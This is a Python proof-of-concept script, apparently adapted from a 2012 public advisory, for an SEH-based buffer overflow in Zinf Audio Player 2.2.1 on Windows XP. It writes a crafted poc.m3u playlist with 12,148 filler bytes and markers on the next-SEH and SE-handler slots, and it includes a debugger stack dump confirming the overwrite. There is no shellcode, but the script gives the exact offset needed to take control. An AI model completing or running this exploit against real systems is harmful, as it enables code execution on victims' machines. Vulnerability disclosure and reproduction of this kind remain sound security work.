|
#!/usr/bin/python
#Product Details:
#---------------------------------------------------------------------------------
#The Zinf audio player is a simple, but powerful audio player for Linux and Win32.
#It supports MP3, Ogg/Vorbis, WAV and Audio CD playback, SHOUTcast/Icecast
#HTTP streaming, RTP streaming, a powerful music browser, theme support
#and a download manager. Zinf is based on the FreeAmp source code. However,
#AMP is a trademark of PlayMedia Systems, Inc., and therefore the original name
#of the project cannot be used any longer. On this website the old project will
#be referred to as FreeA*p.
#---------------------------------------------------------------------------------
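# Crash-reproduction script: writes a playlist whose contents overrun a
# fixed-size buffer in the player and land recognisable marker bytes on the
# SEH record. Only single-argument print() calls are used so the same file
# runs under the Python 2 interpreter named in the shebang and under Python 3.

POC_FILE = "poc.m3u"   # playlist the player is asked to open (see instructions below)
JUNK_LEN = 12148       # filler bytes before the SEH record is reached
MARKER_LEN = 1000      # size of the trailing 0x44 placeholder region

# Author's debugger dump of the stack after the crafted playlist was opened
# (Windows XP SP3, Zinf 2.2.1): the 0x41 filler runs up to 0198F9F8, the
# "pointer to next SEH record" slot at 0198F9FC holds 42424242 ("BBBB"),
# the SE handler slot at 0198FA00 holds 43434343 ("CCCC"), followed by the
# 0x90 and 0x44 markers.
#0198F9B4 41414141 AAAA
#0198F9B8 41414141 AAAA
#0198F9BC 41414141 AAAA
#0198F9C0 41414141 AAAA
#0198F9C4 41414141 AAAA
#0198F9C8 41414141 AAAA
#0198F9CC 41414141 AAAA
#0198F9D0 41414141 AAAA
#0198F9D4 41414141 AAAA
#0198F9D8 41414141 AAAA
#0198F9DC 41414141 AAAA
#0198F9E0 41414141 AAAA
#0198F9E4 41414141 AAAA
#0198F9E8 41414141 AAAA
#0198F9EC 41414141 AAAA
#0198F9F0 41414141 AAAA
#0198F9F4 41414141 AAAA
#0198F9F8 41414141 AAAA
#0198F9FC 42424242 BBBB Pointer to next SEH record
#0198FA00 43434343 CCCC SE handler
#0198FA08 90909090 ....
#0198FA0C 44444444 DDDD
#0198FA10 44444444 DDDD
#
# Reproduction (manual): in the player, right click and select open...,
# then select the playlist file poc.m3u.


def print_banner():
    """Print the original advisory banner (text kept verbatim)."""
    print("Exploit Title: Zinf Audio Player (m3u file) Buffer Overflow Vulnerability(SEH)(POC)\n")
    print("Version: 2.2.1\n")
    print("Date: 3-18-2012\n")
    print("Author: mAniNdArK\n")
    print("Software Link: http://www.zinf.org\n")
    print("Category: Local\n")
    print("Tested on: Windows XP SP3 Professional(En)\n")
    print("Greetz To:Bedu33n,N!1l,Rex0Man,Escape X0ne,JingoBD,Annihilat0r_BD,00xnull,\n")
    print("34GL3_3Y3,5!L3NT @55@55!N,s1l3n7 BD,\n")
    print("Rudr0 Akash,p5YcH0 d0d93r And All The Members\n")
    print("Of Bangladesh Cyber Army(BCA)\n")
    print("Mail:manindark.bca@gmail.com")
    print("---------------------------------------------------------\n")


def build_poc(junk_len=JUNK_LEN, marker_len=MARKER_LEN):
    """Return the playlist contents as bytes.

    Layout: ``junk_len`` bytes of 0x41 filler, a 4-byte next-SEH marker
    ("BBBB"), a 4-byte SE-handler marker ("CCCC"), 8 bytes of 0x90 and
    ``marker_len`` bytes of 0x44. Each region is a distinct byte value so it
    can be told apart in a debugger dump (see the dump above). No shellcode
    is included; the last region is only a placeholder marker.

    Args:
        junk_len: number of filler bytes placed before the SEH record.
        marker_len: number of 0x44 placeholder bytes appended at the end.

    Returns:
        bytes: the concatenated file contents.
    """
    junk = b"\x41" * junk_len
    nseh = b"B" * 4        # lands on the "pointer to next SEH record" slot
    seh = b"C" * 4         # lands on the SE handler slot
    nop = b"\x90" * 8
    marker = b"D" * marker_len
    return junk + nseh + seh + nop + marker


def write_poc(path=POC_FILE, payload=None):
    """Write ``payload`` (default: ``build_poc()``) to ``path``.

    The file is opened in binary mode so the 0x90 bytes are written as single
    bytes on Python 3 as well; text mode would pass them through the locale
    codec. Errors are reported instead of being swallowed by a bare except.

    Args:
        path: destination file name.
        payload: bytes to write; built with default sizes when None.

    Returns:
        bool: True if the file was written, False on an I/O error.
    """
    if payload is None:
        payload = build_poc()
    print("[*] Creating exploit file...\n")
    try:
        with open(path, "wb") as out:
            out.write(payload)
    except (IOError, OSError) as exc:
        print("[!] Error while creating file!")
        print("[!] %s" % exc)
        return False
    print("[*] File successfully created!")
    return True


def main():
    """Print the advisory banner and write the proof-of-concept playlist."""
    print_banner()
    write_poc()


if __name__ == "__main__":
    main()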
|